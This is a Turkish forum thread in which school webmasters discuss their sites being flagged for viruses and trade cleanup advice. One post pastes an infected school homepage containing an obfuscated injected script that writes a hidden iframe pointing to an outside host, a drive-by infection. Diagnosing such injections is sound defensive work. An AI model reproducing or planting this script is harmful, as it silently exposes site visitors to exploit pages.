okul sitesinde virüs uyarısı
- Konbuyu başlatan ersun
- Başlangıç tarihi
http://cinenamikkemal.meb.k12.tr
hocam dediğin olabilir birde sizdeneyin sizde olacakmı bakalım yardımın için teşekkürler..
hocam dediğin olabilir birde sizdeneyin sizde olacakmı bakalım yardımın için teşekkürler..
- Mesajlar
- 574
hocam
sorun şu sanırım siz sayaç haber ziyaretçi defteri vs.içerikleri başka bir siteye bağladınız.
o sitelerde virüs çıkmış o nedenle google sitede yasak koymuş...mutlaka bir çözümü vardır.
örneğin site vi süre boş kaldığında google otomatik ziyaret eder ve sitede herhangi bir zararlı içeriğe yönlenme olmadığını anlarsa tekrar kullanıma açar...
sorun şu sanırım siz sayaç haber ziyaretçi defteri vs.içerikleri başka bir siteye bağladınız.
o sitelerde virüs çıkmış o nedenle google sitede yasak koymuş...mutlaka bir çözümü vardır.
örneğin site vi süre boş kaldığında google otomatik ziyaret eder ve sitede herhangi bir zararlı içeriğe yönlenme olmadığını anlarsa tekrar kullanıma açar...
- Mesajlar
- 574
www.maraththadi.com ????
- Mesajlar
- 708
arkadaşım aynı sorun bendede var
index veya html olan dosyalarıma bir satır ekleniyor
ve trojan içeren siteler açılmaya çalışıyor antivirüs prog. engelliyor
her 3 -4 günde bir oluyor bu olay
internet@meb.gov.tr ye yazdım ama dönen olmadı
http://www.bigadicfatih.meb.k12.tr
adresimiz
index veya html olan dosyalarıma bir satır ekleniyor
ve trojan içeren siteler açılmaya çalışıyor antivirüs prog. engelliyor
her 3 -4 günde bir oluyor bu olay
internet@meb.gov.tr ye yazdım ama dönen olmadı
http://www.bigadicfatih.meb.k12.tr
adresimiz
vseckn
Aktif Üye
- Mesajlar
- 190
Hocam sorun senin sitende değil, sorun mebin sağladığı sunucudan kaynaklanıyor. Daha doğrusu http://www.msefizade.meb.k12.tr adresinden hemen hemen tüm sunucuya yayılmış. Bunu çok önceden yazmıştım siteye ama pek dikkate alınmadı. Bu linke de bakarsanız burada da bulunuyor tehdit, http://bozuyukmakif.meb.k12.tr/ersun' Alıntı:
Norton Internet Security 2009'un hem sizin hem de bu sitede oluşturduğu rapor;
Özet
•Bilgisayar Tehditleri: 7
•Kimlik Tehditleri: 0
•Rahatsız edici etkenler: 0
Bu sitedeki toplam tehdit sayısı: 7
Norton derecelendirmesi Symantec'in otomatik analiz sisteminin sonucudur. Daha fazla bilgi.
Genel Bilgiler
Web Sitesi Konumu Türkiye
Norton Safe Web meb.k12.tr sitesi için güvenlik sorunlarını analiz etti. Bulunan tehditlerin bir örneği aşağıda verilmiştir.
Tehdit Raporu
Bulunan toplam tehdit sayısı: 7
İzinsiz İndirmeler
Bulunan tehditler: 7
Tam liste:
Tehdit Adı: MSIE ADODB.Stream Object File Installation Weakness
Konum: http://msefizade.meb.k12.tr/egitim_kadromuz.html
Tehdit Adı: MSIE ADODB.Stream Object File Installation Weakness
Konum: http://www.msefizade.meb.k12.tr/haber1.html
Tehdit Adı: MSIE ADODB.Stream Object File Installation Weakness
Konum: http://www.msefizade.meb.k12.tr/haber2.html
Tehdit Adı: MSIE ADODB.Stream Object File Installation Weakness
Konum: http://www.msefizade.meb.k12.tr/
Tehdit Adı: MSIE ADODB.Stream Object File Installation Weakness
Konum: http://msefizade.meb.k12.tr/sosylar_faliyetler.html
Tehdit Adı: MSIE ADODB.Stream Object File Installation Weakness
Konum: http://msefizade.meb.k12.tr/okuldan_fotograflar.html
Tehdit Adı: MSIE ADODB.Stream Object File Installation Weakness
Konum: http://msefizade.meb.k12.tr/iletisim.html
muhtemelen iframe tarzı bir virüstür. ftp deki tüm dosyaların yedeğini bilgisyaarınıza alın ve tüm bilgisayarınızı a squared free programı ile taratın tüm tehtidleri silin. Daha sonra avast ile tüm bilgisyaarınınızı taratın. Daha sonra dosyaları tekrar yükleyin ftp nize. Ama şuna dikkat edin ftp şifrenizi hiçbir zaman otomatik kayıt yapmayın. Kolay gelsin ...
- Mesajlar
- 1,587
Kod:
<html>
<head>
<meta http-equiv="Content-Language" content="tr">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
</head>
<body>
<p align="center"><b><font size="6" color="#FF0000">ÇİNE NAMIK KEMAL İLKÖĞRETİM
OKULU </font></b></p>
<p align="center"><b><font size="6" color="#FF0000">İNTERNET SİTESİNE HOŞ
GELDİNİZ </font></b></p>
<p align="center"><b><font size="6" color="#FF0000">SİTEMİZ KISA BİR SÜRE İÇİN
BAKIMDADIR. </font></b></p>
<p> </p>
<p><font color="#0000FF" size="6">TELEFONLARIMIZ : 0256 7116055</font></p>
<p><font color="#0000FF" size="6">
0256 7116116</font></p>
<p><font color="#0000FF" size="6">E MAİL:
318732@meb.k12.tr</font></p>
<p> </p> [size=150]Burası virrus kaynağınız herhalde...[/size]
[color=#FF0000]<script>var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%67%6b%73%64%68%2e%63%6e%2f%66%6f%72%75%6d%2f%69%6d%61%67%65%2f%69%6e%64%65%78%2e%70%68%70%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');document.write(fr);</script><script>var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%67%6b%73%64%68%2e%63%6e%2f%66%6f%72%75%6d%2f%69%6d%61%67%65%2f%69%6e%64%65%78%2e%70%68%70%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');document.write(fr);</script></[/color]body>
</html>http://www.fatihhayrioglu.com/iframe-vi ... anin-yolu/ bir de buradaki çözüm yolunu deneyin. İnşallah virüsten kurtulursunuz.
*Arkadaşlar benim siteme de virüs bulaşmış. Bütün script dosyalarını tek tek temizledim. Şu an site alnım boş ama hala saldırgan site diye uyarı veriyor. Google da web yöneticisi diye yer var oradan yeniden siteyi inceleme talebinde bulunmaya çalıştım sitenin bana ait olduğunu doğrulayamıyorum. bunu deneyen varsa bana yol gösterebilir mi?
Arkadaşlar advanced find and replace adında bi program var. (burda verilmiş olabilir) script ifadesini find kısmına yazıp replace kısmını boş bırakın. bütün dossyalarda (indexler) bu ifadeyi siler. siteyi indirip alanı sıfırlamak, inen sitede bu programla scriptleri silmek, ve tabi makineninde bi virüs programıyla taratılması şart. biz bu şekilde kurtulduk. saygılar....
